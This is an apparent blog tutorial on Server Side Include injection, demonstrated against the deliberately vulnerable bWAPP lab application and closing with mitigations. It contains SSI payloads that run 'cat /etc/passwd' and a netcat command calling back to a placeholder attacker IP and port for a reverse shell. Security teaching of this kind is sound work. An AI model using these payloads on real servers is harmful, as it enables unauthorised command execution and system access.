SSI — Server Side Include Injection

Vikas Sharma
4 min readMay 18, 2021

--

Let us say , we have a web application containing multiple pages , each requires a change in the specific content (like may be name of user or anything). Therefore it would be difficult to change the HTML code manually every single time. This is where Server Side Inclusion takes place which can dynamically inject the required input to the all the required places(in HTML code).

Content:

  • Introduction
  • SSI Injection Vulnerability & Detection
  • SSI Injection Attack Scenario
  • Mitigations of SSI Injection Vulnerability
  • Conclusion

Introduction

SSIs (Server Side Includes) are the directives which are present in the web application to feed an HTML page with the dynamic content based on the input provided by the users.

It’s the feature to allow developers to dynamically generate web content (html) by using ‘#’ directives.

It executes some action before the current page is loaded , making it different from CGIs (Comman Gateway interfaces).

SSI Injection Vulnerability and Detection:

SSI vulnerability allows an attackers to exploit the web app by injecting scripts or SSI directives in HTML Pages or executing arbitrary codes remotely.

SSI Injection attack is performed by manipulating SSI used in application in malicious way either by intercepting the request or user input.

In order to detect the vulnerability we can verify whether the web application is validating or sanitizing the html inputs used in SSI directives as shown below:

Other way is to find the pages with extension “.stm” , “.shtm”, “.shtml”. It is not necessary that application cannot support SSI without the presence of such pages.

In any case, the attack will be successful only if the web server permits SSI execution without proper validation. This can lead to access and manipulation of file system and process under the permission of the web server process owner.

Thus, it may lead attacker to access the sensitive files , password files and remote code executed with server privileges etc

SSI Injection Attack Scenario:

bWAPP , a vulnerable application provides us the platform for SSI Injection Demonstration.

So we have provided an input to the application which redirects us to:

This shows that first name and last name are dynamically generated thus can be possibility of SSI Injection.

Lets try the payloads of SSI Injection in the inputs to verify whether the vulnerability exists or not.

<! — #exec cmd=”cat /etc/passwd” — >

On submitting the payloads , we can find the command got succesfully executed:

Escalating SSI to RCE:

Payload : <! — #exec cmd=”nc {IPADD} {PORTNUMBER}” — >

Start the netcat listener before firing up the payload. Here in my case I have used Port no. 2000 for the exploit

Once we submit the payload we get the reverse shell connected to the syste.

Payloads:

Mitigations

  • Sanitizing the HTML inputs
  • Encoding the user input before rendering the pages
  • Proper configuration of server for dynamic content parsing
  • Avoid having pages with the extension mentioned before

Conclusion:

SSI injection is quite rare vulnerability both for developers and attackers , but if properly exploited can provide attacker a system level privileges and access to the target.

Thus developer might also not aware of the sanitization of input while using SSI directive thus making it more dangerous.

--

--

Vikas Sharma
Vikas Sharma

Written by Vikas Sharma

Exploring the Intersection of Tech and Spirituality | Cybersecurity Enthusiast and Concordia grad exploring the nexus of tech, security, and innovation | 🧑‍💻

No responses yet